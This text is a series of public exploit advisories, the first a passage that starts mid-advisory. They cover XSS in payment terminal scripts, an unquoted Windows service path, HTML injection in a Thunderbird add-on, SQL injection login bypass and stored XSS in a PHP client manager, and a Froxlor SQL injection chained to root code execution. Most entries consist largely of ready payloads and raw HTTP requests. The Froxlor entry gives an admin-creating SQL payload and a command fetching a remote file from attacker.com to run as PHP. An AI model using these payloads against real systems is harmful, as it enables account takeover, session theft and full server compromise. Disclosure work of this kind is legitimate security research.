Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Authorize.net Payment Terminal v2.4.1, the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site browser to web-application requests. The non-persistent cross site scripting web vulnerabilities are located in the `item_description`,`fname`,`lname`,`address`,`city`,`email` parameters of the `Billing Information` or `Payment Information` formular. Attackers are able to inject own malicious script code to the `Description`,`Firstname`, `Lastname`,`Address`,`City`,`Email` input fields to manipulate client-side requests. The request method to inject is post and the attack vector is non-persistent on client-side. In case the form is implemented to another web-service attackers are able to exploit the bug by triggering an execute of the script code in the invalid exception-handling. The PayPal PRO Payment Terminal v3.1 and Stripe Payment Terminal v2.2.1 impacts the same vulnerable script and is affected as well by the simple validation vulnerability. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Billing Information [+] Payment Information Vulnerable Input(s): [+] Description [+] Firstname [+] Lastname [+] Address [+] City [+] Email Vulnerable Parameter(s): [+] item_description [+] fname [+] lname [+] address [+] city [+] email Affected Module(s): [+] Exception Handling (Invalid) Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. Exploitation: Payload ">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe> ">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe> Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack) <div id="accordion"> <!-- PAYMENT BLOCK --> <h2 class="current">Payment Information</h2> <div class="pane" style="display:block"> <label>Description:</label> <input name="item_description" id="item_description" type="text" class="long-field" value=""> <iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" <div class="clr"></div> <label>Amount:</label> <input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);"> <div class="clr"></div> </div> <!-- PAYMENT BLOCK --> - <!-- BILLING BLOCK --> <h2>Billing Information</h2> <div class="pane"> <label>First Name:</label> <input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>Last Name:</label> <input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>Address:</label> <input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>City:</label> <input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> --- PoC Session Logs (POST) --- https://autherminal.localhost:8080/authorize-terminal/ Host: autherminal.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125 Content-Length: 3270 Origin:https://autherminal.localhost:8080 Connection: keep-alive Referer:https://autherminal.localhost:8080/authorize-terminal/ Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411 &email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123 &g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF &submit.x=50&submit.y=14&process=yes - POST: HTTP/3.0 200 OK content-type: text/html; charset=utf-8 vary: Accept-Encoding Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction of the input in combination with a parse or escape of the content. After that the onkeyup checkFieldBack should be sanitized correctly to prevent script code executions for clients. Security Risk: ============== The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 04-11-2021 # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Tested Version: 9.31 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe Auto C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: srvInventoryWebServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : srvInventoryWebServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection # Date: 2021-11-05 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://github.com/thundernest/import-export-tools-ng # Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ # Version: 10.0.4 # Tested on: Windows Document Title: =============== ImportExportTools NG 10.0.4 - HTML Injection Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2308 Release Date: ============= 2021-11-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2308 Common Vulnerability Scoring System: ==================================== 4.2 Vulnerability Class: ==================== Script Code Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Adds tools to import/export messages and folders (NextGen). (Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for mozilla thunderbird. Affected Product(s): ==================== Christopher Leidigh Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird) Vulnerability Disclosure Timeline: ================================== 2021-10-07: Researcher Notification & Coordination (Security Researcher) 2021-10-08: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-11-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A html inject web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for mozilla thunderbird. The vulnerability allows a remote attacker to inject html payloads to compromise application data or session credentials. The vulnerability is located in the html export function. Subject content on export is not sanitized like on exports in mozilla itself. Thus allows a remote attacker to send malicious emails with malformed a html payloads that executes on preview after a html export by the victim user. Vulnerable Module(s): [+] Export (HTML) Proof of Concept (PoC): ======================= The web vulnerability can be exploited by remote attackers without user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install mozilla thunderbird 2. Install ImportExportTools NG v10.0.4 3. Use another email to write to the target inbox were the export takes place Note: Inject into the subject any html test payload 4. Target user exports his content of the inbox in html were the payload executes 5. Successful reproduce of the encode validation vulnerability! Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved. Vulnerable Source: ImportExportTools Exported HTML File <html><head> <style> table { border-collapse: collapse; } th { background-color: #e6ffff; } th, td { padding: 4px; text-align: left; vertical-align: center; } tr:nth-child(even) { background-color: #f0f0f0; } tr:nth-child(odd) { background-color: #fff; } tr>:nth-child(5) { text-align: center; } </style> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Posteingang</title> </head> <body> <h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th> <th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr> <tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html"> payload in subject "><iframe src="evil.source" onlo<="" a=""></td> <td>test@vulnerability-lab.com" <test@vulnerability-</td> <td>user@test-service.de</td> <td nowrap>10/07/2021</td> <td align="center">* </td></tr> Reference(s): https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/ Solution - Fix & Patch: ======================= The output that is visible in the subject needs to be encoded and secure sanitized to prevent an execute from any listed value. Restrict the execution via import/export with special chars to prevent further attacks. Credits & Authors: ================== Vulnerability-Lab [admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass) # Exploit Author: Sentinal920 # Date: 5-11-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: Login # Vulnerable Parameter: "password" Technical description: An SQL Injection vulnerability exists in the Simple Client Management System. An attacker can leverage the vulnerable "password" parameter in the "Login.php" web page to authenticate as an admin user. Steps to exploit: 1) Navigate to http://localhost/cms/admin/login.php 2) Set username as admin and insert your payload in the password parameter Proof of concept (Poc): The following payload inside password will allow you to login into the web server as admin admin'or'1'%3D'1 --- POST /cms/classes/Login.php?f=login HTTP/1.1 Host: localhost Content-Length: 51 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close username=admin'or'1'%3D'1&password=admin'or'1'%3D'1 ---

# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Sentinal920 # Date: 5-11-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: client,invoice # Vulnerable Parameters: "lastname", "remarks" Technical description: A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/cms/admin/?page=client 2) Click on add new client 3) Insert your payload in the "lastname" parameter or the "description" parameter 4) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert(1)</script> 1) XSS POC in Add New Client ----------------------------- POST /cms/classes/Master.php?f=save_client HTTP/1.1 Host: localhost Content-Length: 1026 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=client/manage_client Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="lastname" <script>alert(1)</script> ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="firstname" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="middlename" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="dob" 2021-11-03 ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="contact" xxxxxxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="address" xxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="email" xxxx@xxx.com ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- 2) XSS POC in Add New Invoice ----------------------------- POST /cms/classes/Master.php?f=save_invoice HTTP/1.1 Host: localhost Content-Length: 1032 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=invoice/manage_invoice Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="id" ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="client_id" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="service_id[]" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="price[]" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="total_amount" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="remarks" <script>alert(1)</script> ------WebKitFormBoundaryEk0iOWhhoA0lApXo--

# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) # Exploit Author: Martin Cernac # Date: 2021-11-05 # Vendor: Froxlor (https://froxlor.org/) # Software Link: https://froxlor.org/download.php # Affected Version: 0.10.28, 0.10.29, 0.10.29.1 # Patched Version: 0.10.30 # Category: Web Application # Tested on: Ubuntu # CVE: 2021-42325 # 1. Technical Description: # # Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled # 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # # 2.1 Privilege Escalation # # - Sign into Froxlor as a customer # - View your databases # - Create a database # - Put your payload into the "User/Database name" field (if enabled) # - Application will error out however your SQL query will be executed # # The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- # # 2.2 Remote Code Execution # # To achieve RCE as root: # # - Sign into Froxlor as the newly created admin account (payload example creds are x:a) # - Go to System Settings # - Go to Webserver settings # - Adjust "Webserver reload command" field to a custom command # - The command must not contain any of the following special characters: ;|&><`$~? # - For details, see "safe_exec" function in lib/Froxlor/FileDir.php # - For example commands see Payloads 4.2 section # - Trigger configuration file rebuild # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command # 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) # 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration # The credentials are: # - username: x # - password: a # # `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- # # # 4.2 Remote Code Execution payload # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php # 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure # 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30